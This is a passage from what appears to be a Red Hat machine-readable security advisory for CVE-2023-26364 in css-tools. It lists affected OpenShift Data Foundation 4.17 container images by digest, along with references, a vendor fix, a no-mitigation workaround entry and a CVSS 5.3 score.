"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26364", }, { category: "external", summary: "RHBZ#2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26364", url: "https://www.cve.org/CVERecord?id=CVE-2023-26364", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", }, { category: "external", summary: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", url: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", }, ], release_date: "2023-11-17T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "No mitigation is yet available for this vulnerability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", 